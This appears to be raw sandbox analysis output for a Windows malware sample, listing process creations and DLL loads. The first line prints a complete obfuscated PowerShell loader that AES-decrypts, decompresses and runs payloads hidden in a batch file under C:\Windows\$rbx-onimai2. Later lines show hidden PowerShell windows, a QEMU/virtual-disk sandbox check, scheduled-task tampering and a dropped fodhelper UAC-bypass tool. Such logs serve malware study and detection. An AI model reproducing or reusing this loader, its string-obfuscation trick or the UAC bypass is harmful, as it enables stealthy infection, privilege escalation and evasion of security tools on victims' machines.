Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\paint.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: wldp.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: propsys.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: netutils.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: version.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: userenv.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: edputil.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: secur32.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: mlang.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: wininet.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: profapi.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: mrmcorer.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.ui.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: inputhost.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\services64.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe Section loaded: pdh.dll
Source: C:\Windows\explorer.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
